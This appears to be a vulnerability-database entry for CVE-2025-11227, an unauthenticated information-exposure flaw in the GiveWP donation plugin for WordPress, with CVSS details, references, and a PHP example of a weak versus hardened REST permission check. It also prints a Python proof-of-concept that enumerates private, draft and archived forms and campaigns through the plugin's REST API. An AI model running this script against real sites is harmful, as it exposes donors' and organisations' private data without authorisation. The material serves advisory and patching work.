Security Vulnerability Report
CVE-2025-11227 CVSS 6.5 MEDIUM

CVE-2025-11227

Published: 2025-10-04 03:15:37
Last Modified: 2025-11-26 17:03:11

Description

The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 4.10.0 via the 'registerGetForm', 'registerGetForms', 'registerGetCampaign' and 'registerGetCampaigns' functions due to a missing capability check. This makes it possible for unauthenticated attackers to extract data from private and draft donation forms, as well as archived campaigns.
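Added illustration, not GiveWP's code or its patch: the "missing capability check" pattern in a WordPress REST route for fetching one form, beside a hardened variant that gates non-public items in the route's permission_callback. The namespace, capability name and in-memory sample data are assumptions standing in for the plugin's own.

```php
<?php
// Added illustration, not GiveWP's code: gating non-public items in a WordPress
// REST "get one form" route. Namespace, capability and sample data are placeholders.
const ILLUSTRATIVE_CAP = 'manage_options'; // placeholder capability

// Constructed sample data in place of the plugin's storage.
function example_find_form( int $id ): ?array {
    $forms = [
        1 => [ 'id' => 1, 'title' => 'Annual appeal',    'status' => 'publish' ],
        2 => [ 'id' => 2, 'title' => 'Board-only fund',  'status' => 'private' ],
        3 => [ 'id' => 3, 'title' => 'Untitled (draft)', 'status' => 'draft' ],
    ];
    return $forms[ $id ] ?? null;
}

// Weak pattern (the class of bug behind CVE-2025-11227): the route is readable
// by anyone and nothing ever consults the item's status.
function weak_register_form_route() {
    register_rest_route( 'example/v1', '/forms/(?P<id>\d+)', [
        'methods'             => WP_REST_Server::READABLE,
        'permission_callback' => '__return_true',
        'callback'            => fn( WP_REST_Request $r ) => example_find_form( (int) $r['id'] ),
    ] );
}

// Hardened pattern: permission_callback runs before the handler, loads the item
// and lets anonymous callers see published forms only. Apply the same status
// filter to the list route so drafts and private forms never appear there.
function hardened_form_permission( WP_REST_Request $request ) {
    $form = example_find_form( (int) $request['id'] );
    if ( null === $form ) {
        return new WP_Error( 'rest_not_found', 'Form not found.', [ 'status' => 404 ] );
    }
    if ( 'publish' === $form['status'] || current_user_can( ILLUSTRATIVE_CAP ) ) {
        return true;
    }
    // 401 for anonymous callers, 403 for logged-in users lacking the capability.
    return new WP_Error( 'rest_forbidden', 'Sorry, you are not allowed to view this form.',
        [ 'status' => rest_authorization_required_code() ] );
}

function hardened_register_form_route() {
    register_rest_route( 'example/v1', '/forms/(?P<id>\d+)', [
        'methods'             => WP_REST_Server::READABLE,
        'permission_callback' => 'hardened_form_permission',
        'callback'            => fn( WP_REST_Request $r ) => rest_ensure_response( example_find_form( (int) $r['id'] ) ),
        'args'                => [ 'id' => [ 'type' => 'integer', 'required' => true ] ],
    ] );
}
add_action( 'rest_api_init', 'hardened_register_form_route' );
```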

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:givewp:givewp:*:*:*:*:*:wordpress:*:* - VULNERABLE
GiveWP Donation Plugin up to and including 4.10.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-11227 PoC - GiveWP Information Exposure
# Exploits missing capability check in REST API routes
import requests

TARGET_URL = "http://target-wordpress-site.com"


# Step 1: Enumerate all donation forms (including private and draft)
def get_forms(target):
    """Retrieve all donation forms including private/draft ones"""
    url = f"{target}/wp-json/givewp/v3/forms/"
    headers = {
        "User-Agent": "Mozilla/5.0",
        "Accept": "application/json"
    }
    response = requests.get(url, headers=headers)
    if response.status_code == 200:
        forms = response.json()
        print(f"[+] Found {len(forms)} donation forms")
        for form in forms:
            print(f" - ID: {form.get('id')}, Title: {form.get('title')}, Status: {form.get('status')}")
        return forms
    return None


# Step 2: Get specific form details
def get_form_details(target, form_id):
    """Retrieve details of a specific donation form"""
    url = f"{target}/wp-json/givewp/v3/forms/{form_id}"
    response = requests.get(url)
    if response.status_code == 200:
        return response.json()
    return None


# Step 3: Enumerate all campaigns (including archived)
def get_campaigns(target):
    """Retrieve all campaigns including archived ones"""
    url = f"{target}/wp-json/givewp/v3/campaigns/"
    response = requests.get(url)
    if response.status_code == 200:
        campaigns = response.json()
        print(f"[+] Found {len(campaigns)} campaigns")
        for campaign in campaigns:
            print(f" - ID: {campaign.get('id')}, Title: {campaign.get('title')}, Status: {campaign.get('status')}")
        return campaigns
    return None


# Step 4: Get specific campaign details
def get_campaign_details(target, campaign_id):
    """Retrieve details of a specific campaign"""
    url = f"{target}/wp-json/givewp/v3/campaigns/{campaign_id}"
    response = requests.get(url)
    if response.status_code == 200:
        return response.json()
    return None


if __name__ == "__main__":
    print(f"[*] Targeting: {TARGET_URL}")
    forms = get_forms(TARGET_URL)
    campaigns = get_campaigns(TARGET_URL)
```

References

https://plugins.trac.wordpress.org/browser/give/tags/4.9.0/src/API/REST/V3/Routes/Campaigns/RegisterCampaignRoutes.php#L60 (Product)
https://plugins.trac.wordpress.org/browser/give/tags/4.9.0/src/API/REST/V3/Routes/Campaigns/RegisterCampaignRoutes.php#L91 (Product)
https://plugins.trac.wordpress.org/browser/give/tags/4.9.0/src/DonationForms/Routes/DonationFormsEntityRoute.php#L52 (Product)
https://plugins.trac.wordpress.org/browser/give/tags/4.9.0/src/DonationForms/Routes/DonationFormsEntityRoute.php#L82 (Product)
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3371948%40give&new=3371948%40give&sfp_email=&sfph_mail= (Patch)
https://www.wordfence.com/threat-intel/vulnerabilities/id/54db1807-69ff-445c-9e02-9abce9fd3940?source=cve (Third Party Advisory)

Weakness
CWE-285

NVD Configuration
cpe:2.3:a:givewp:givewp:*:*:*:*:*:wordpress:*:* - vulnerable, versionEndExcluding 4.10.1